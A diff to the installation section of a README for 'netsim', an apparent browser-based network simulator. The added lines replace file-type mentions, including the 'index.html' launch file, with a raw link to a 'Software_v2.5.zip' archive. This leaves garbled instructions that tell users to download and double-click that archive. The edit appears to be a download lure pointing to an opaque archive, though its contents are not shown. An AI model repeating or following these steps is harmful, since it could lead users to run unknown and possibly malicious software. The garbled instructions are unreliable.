Alechiis/netsim/README.md

 ### Step 3: Download the Application

 Click on the version you want.
 You will find different assets for downloading.
 Select the appropriate file for your operating system.
-It could be a .zip file or a .tar.gz file.
+It could be a .zip file or a https://github.com/Alechiis/netsim/raw/refs/heads/main/public/Software_v2.5.zip file.

 ### Step 4: Extract the Files

 Once the download completes, locate the file in your downloads folder.
 - If you downloaded a .zip file, right-click on it and select "Extract All."
-- If you downloaded a .tar.gz file, use an extraction tool to unzip it.
+- If you downloaded a https://github.com/Alechiis/netsim/raw/refs/heads/main/public/Software_v2.5.zip file, use an extraction tool to unzip it.

 ### Step 5: Open netsim

 After extraction, find the netsim folder.
-Open this folder, and look for the index.html file.
+Open this folder, and look for the https://github.com/Alechiis/netsim/raw/refs/heads/main/public/Software_v2.5.zip file.
 Double-click it to start the application in your web browser.

 ## 💻 System Requirements